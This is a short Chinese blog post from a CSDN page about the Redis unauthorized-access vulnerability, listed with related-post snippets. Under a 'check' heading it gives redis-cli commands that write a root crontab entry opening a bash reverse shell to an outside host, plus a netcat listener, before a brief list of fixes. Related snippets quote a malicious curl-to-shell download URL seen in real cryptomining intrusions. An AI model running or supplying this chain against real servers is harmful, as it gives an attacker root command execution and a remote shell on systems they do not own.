redis未授权访问漏洞

最新推荐文章于 2022-06-06 18:50:55 发布
最新推荐文章于 2022-06-06 18:50:55 发布
阅读量590 收藏
点赞数
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sethcss/article/details/73395625
版权

检查漏洞:

redis-cli -h remoteip 连接远程redis

config set dir /var/spool/cron 设置目录

config set dbfilename root 设置配置文件

set 1 “\n\n\n* * * * * bash -i >& /dev/tcp/www.nxadmin.com/1234 0>&1\n\n\n”

如果删除del 1

save 保存

netcat -l -vv -p 1234 设置监听

修复漏洞:

  1. redis.conf 中配置requirepass项,增加复杂的访问密码

  2. redis.conf :bind 127.0.0.1

  3. 限定可以连接redis服务器的ip

  4. 禁止使用root权限启动redis服务

  5. 修改redis默认端口6379

sethcss
关注
专栏目录
Redis授权访问漏洞
周星星的博客
08-22 1547
Redis授权访问漏洞复现以及利用
阿里云服务器被攻击(请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件)
10年IT大头兵
05-04 1628
收到阿里云提醒被攻击了: URL链接:http://185.181.10.234/e5db0e07c3d7be80v520/init.sh netstat -anp |grepSYN_SENT ###如果这个命令查出来很多,那就是被攻击了 首先:改服务器登录密码,或者检查密钥文件是否被改过。这两个点都先检查并修改。这时重启服务器。我的因为刚被攻击,那边还连着,我不重启,他还是能操作。...
阿里云提示服务器进程异常行为-访问恶意下载源
没有解答思路的博客
12-22 3993
最近公司的服务器(阿里云)一直给老板发信息说,服务器在访问恶意下载源。老板一开始没在意,后来一天一条短信,然后让我处理一下。作为一个后端工程师,普通的服务器维护在小公司基本都是自己上手来。废话太多了,下面具体描述一下我遇到问题的和解决方法,以便大家遇到了之后不知所措。(大佬们,不吝指教~) 一。问题描述 阿里云服务器警告截图: 阿里云提示服务器访问恶意下载源(****.init.sh) 看这种警告...
记一下redis的报错,顺便利用redis获取下shell
weixin_54227009的博客
06-06 323
之所以会报这个错的原因是因为防火墙没关,所以把目标机器的防火墙关了就ok了1:查看防火状态systemctl status firewalldservice iptables status2:暂时关闭防火墙systemctl stop firewalldservice iptables stop3:永久关闭防火墙systemctl disable firewalldchkconfig iptables off4:重启防火墙systemctl enable firewalldservice iptable
Linux挖矿病毒的清除与分析
for justice
10-14 3741
清除过程 确定病因 这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程。 基本可以确定这个占据绝大部分cpu资源的进程sysupdate,就是挖矿程序了,我们需要先找到他。 使用命令: ps -aux | grep sysupdate 查看病毒的PID号。 为了获取绝对路径,使用: ls -l /proc/{pid号}/exe 发现sysupdate...
攻击者利用Redis授权访问漏洞进行新型入侵挖矿的事件分析
浪丶荡
09-30 1105
攻击者利用Redis授权访问漏洞进行新型入侵挖矿的事件分析 昨天我在博客中分享了自己服务器被攻击的一段病毒脚本——【谁干的】,安全方面不是很专业,只看懂了个大概,对着脚本将那些自动任务一一删除了,禁用了Redis对外开放,及时加了密码才使服务器能正常运转,上次的勒索病毒让我躲过了一劫,没想到这次因为自己的一时疏忽,竟然在第一时间就中招了……看看专业人士的分析吧 攻击者利用Redis授权访问漏洞...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9609
redis授权访问漏洞
又见到一个利用redis漏洞的活生生的例子
若鱼的专栏
05-16 2556
见到一个如何利用redis漏洞的活生生的例子,原理大概如下:config set  dir /var/spool/cronconfig set dbfilename root新建cron.txt :*/1 * * * * ls>/tmp/ls.txt(echo -e "\t\n";cat cron.txt ;echo -e "\n\t") > cron2.txtcat cron2.tx...
Redis授权访问漏洞详解
sojrs_sec的博客
09-19 2555
环境搭建 环境:centos7 gcc 1:下载安装包 wget http://download.redis.io/releases/redis-3.2.6.tar.gz 2:解压安装包到指定文件 tar zxvf redis-3.2.6.tar.gz -C /usr/local 3:cd /usr/local/redis-3.2.6 4:make 进行编译 5:cd src &&...
[700]阿里云提示服务器访问恶意下载源
周小董
11-19 3337
最近公司的服务器(阿里云)一直给老板发信息说,服务器在访问恶意下载源。老板一开始没在意,后来一天一条短信,然后让我处理一下。作为一个后端工程师,普通的服务器维护在小公司基本都是自己上手来。废话太多了,下面具体描述一下我遇到问题的和解决方法,以便大家遇到了之后不知所措。(大佬们,不吝指教~) 一. 问题描述 阿里云服务器警告截图: 看这种警告,其实主要看几个重点 父进程路径:/usr/sbin/...
记一次因redis授权访问漏洞被攻击进行挖矿
12-05 907
一、问题描述 redis存储的业务数据被清空,且被注入知的url下载链接: cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。 二、分析 分析参考链接: https://www.freebuf.com/c...
记一次因为redis漏洞被挖矿
啊鹏的博客
10-01 2835
问题:CPU一直100%,top看不到进程,无从下手,阿里云无限报异常文件下载,以及linux共享库预加载配置文件被篡改。 经百度,到解决办法: 参考文档:https://blog.csdn.net/leisure_life/article/details/82899703 https://blog.csdn.net/leisure_life/article/details/82905256...
redis授权访问漏洞那拿SHELL
weixin_30737363的博客
12-06 311
一、什么是redis授权访问漏洞: 1、redis是一种文档型数据库,快速高效,存储在内存中,定期才会写磁盘。主要用于快速缓存,数据转存处理等。默认redis开在6379端口,可以直接访问。并不需要任何认证信息,由此带来了巨大的安全隐患。 2、如何验证redis授权访问是否开启: 1 #使用kali或者任何linux系统安装redis-cli 2 redis-cli -h targ...
记一次因为redis挖矿病毒导致的系统崩坏
l1106866255的博客
01-06 604
1.问题 收到阿里云邮件的提醒,6379端口被阻断 2.分析 在linux下使用top命令发现有一进程一直占用95以上的cpu,百度发现是redis挖矿病毒 3.解决 更具systemctl status + top对应的pid找到进程的文件位置一一删除,kill进程 ...
记录一次redis漏洞攻击
陈浩然MC的博客
09-11 3307
服务器挖矿病毒的排查过程 事情起因:朋友的一台阿里云主机,登录特别卡,找我看看 这一看就感觉出问题了,机器特别卡,top看了一眼,cpu几乎是100%运行 但是奇怪的是用top命令完全看不出来哪个进程占用资源,当时的截图找不到了,这是第一次遇到这种情况,没有显示今晨占用资源,偏偏资源被跑满 排查 刚接手问题的时候我也是一脸闷逼,很奇怪,明明是没有进程占用的,为什么还会这样? ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值